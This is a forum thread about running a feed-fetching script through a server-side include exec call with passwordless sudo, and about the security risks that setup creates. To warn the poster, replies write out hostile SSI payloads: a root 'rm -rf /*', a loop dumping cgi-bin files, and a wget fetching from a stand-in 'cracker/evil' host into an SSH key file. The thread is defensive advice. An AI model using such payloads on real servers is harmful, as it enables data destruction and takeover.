when using SSI, can I limit how often a command can be run?
Posted in the Linux - Newbie forum on LinuxQuestions.org.
For instance, I've got a little script that goes out and gets all my rss feeds, then parses them to display on my webpage. Rather than have cron go out and update these feeds every 10 minutes (I want to make sure they're always fresh, but this seems a bit much), I'm just using server side includes and have a link on my page that executes the script (via sudo, which I have configured to allow apache to run this command without password) so that I only have to update them when I'm actually reading them. This seems to be working really well, but it leaves the obvious ability for somebody viewing the webpage to click the link a million times and bog down (or crash) my PC.
To make sure I'm clear, here's the code on the webpage to issue the command...
<!--#exec cmd="sudo getnews" -->
So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? I've got the getnews "script" located in /bin and it's basically just a shell "script" (I use quotes cuz I'm no script writer...it's just a file that starts with #!/bin/bash and then just issues a bunch of calls to a perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way I can set a minimum wait between times apache is allowed to use the sudo command (remember though, no password is set, so I can't just use the password expire) to issue this, which would essentially create the same effect?
You can look at the man pages for wait or sleep and use those. Here is the first line of the man page for sleep:
The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES below).
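sleep alone only delays a run, though; to actually enforce a minimum time between runs, the script can check the age of a stamp file before doing anything. A rough sketch of that idea (the stamp path, interval, and "refreshing feeds" placeholder are all made up, not from the actual getnews script):

```shell
#!/bin/bash
# Sketch: enforce a minimum interval between runs using the
# modification time of a stamp file. Paths/interval are invented.
STAMP="${STAMP:-/tmp/getnews.stamp}"
MIN_INTERVAL="${MIN_INTERVAL:-600}"   # seconds (10 minutes)

allowed_to_run() {
    local now last
    now=$(date +%s)
    if [ -f "$STAMP" ]; then
        last=$(stat -c %Y "$STAMP")   # GNU stat: mtime in seconds
        [ $(( now - last )) -ge "$MIN_INTERVAL" ] || return 1
    fi
    touch "$STAMP"                    # record this run
    return 0
}

if allowed_to_run; then
    echo "refreshing feeds"
    # the real feed-fetching calls (perl script, wget, ...) go here
else
    echo "too soon; skipping"
fi
```

That way clicking the link a million times only costs you a stat and a touch, not a million feed fetches.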
But, if you decide to stay with the current setup of your program, you are creating a real big security risk. Allowing the server-side include #exec command allows all users to execute system commands directly on the server file system. So I can do this on your machine as root right now:
<!--#exec cmd="sudo rm -rf /*" -->
This would probably be the least of your problems. A rootkit will be installed faster than you can say Debian. If you do not take security precautions, people will abuse your box and the whole internet will laugh and point at you.
Thanks for the reply. I'll check the man pages for those...
As for the security risk, I had read that. Let me just confirm that what I've done is sufficient....
I DO have a guestbook on the site (which is what helps create the risk due to the write access that this gives visitors, right?), but it has its own subdirectory. I have set that directory in the httpd.conf file to NOT allow execs. This works, right? I've also tried to confirm by adding a new guestbook entry, and adding this to it...
The issue is not only creating a directory where the shtml file cannot execute commands, it is also who it runs as. Apache is usually set to run as a non-root user. If you have changed /etc/sudoers to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could rewrite the URL to include malicious code that Apache can execute as root! This is serious.
Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done"-->
Or <!--#exec cmd="touch .ssh/identity.pub"-->
<!--#exec cmd="wget -q -O .ssh/identity.pub http://cracker/evil"-->
I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.
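That decoupled approach can be sketched as a single crontab entry (the URL and path here are invented for illustration): cron fetches the feed on a schedule, and the .shtml page only ever reads the local copy, so visitors can never trigger a fetch, let alone a sudo command.

```
# crontab sketch (crontab -e as a normal user; URL and path invented):
# every 10 minutes, quietly fetch the feed into the web root
*/10 * * * * wget -q -O /var/www/html/feeds/news.rss http://example.com/feed.rss
```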
I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn't like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly....right? That is assuming you were suggesting adding the curl code right into the webpage....
I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figured that would take care of the sudo security risk.
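For reference, that kind of single-command restriction looks roughly like the line below in the sudoers file (edited with visudo; this spec line is my guess at the setup, not copied from it). Note that even a single allowed command can be leveraged if the script is writable by apache or calls other programs, so dropping #exec entirely is still the safer route.

```
# /etc/sudoers sketch: apache may run only this one script, no password
apache ALL = NOPASSWD: /bin/getnews
```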
After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.
Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)
You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.
I'm starting to think I just did this for something to do, as the more I think about it the more silly this whole venture seems. But again, it was a fun little experiment and I learned something. I have resorted to my original setup, which really was the most logical. I have cron updating the feeds every 10 minutes (as well as a couple of weather radar images - more use for wget) and the frame on the webpage auto updates every 5.
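For anyone wanting to copy this setup: the auto-updating frame part is just a standard meta refresh tag in the frame's HTML (300 seconds = 5 minutes):

```
<meta http-equiv="refresh" content="300">
```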
Question regarding wget; Is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces an output message like "continuing in background...PID.....output will be written to wget-whatever.log" or whatever (which then gets mailed to me in /var/spool/mail), and then, of course, saves a log file. So, I've got cron deleting these log files periodically as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created?
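In case it helps: wget's -q flag suppresses all of wget's own output, and the "continuing in background... output will be written to..." message comes from -b (background mode), which is also what creates the wget-log file. Under cron you don't need -b at all, since the job already runs detached. A sketch (URL and path invented):

```shell
# -q: completely quiet; -O: write the download where you want it.
# Dropping -b avoids the wget-log file entirely; cron jobs already
# run "in the background". URL and path are invented examples.
wget -q -O /tmp/news.rss http://example.com/feed.rss

# belt and braces: redirect everything so cron has nothing to mail
wget -q -O /tmp/news.rss http://example.com/feed.rss >/dev/null 2>&1
```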
Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....
Last edited by jeffreybluml; 03-01-2005 at 10:07 AM.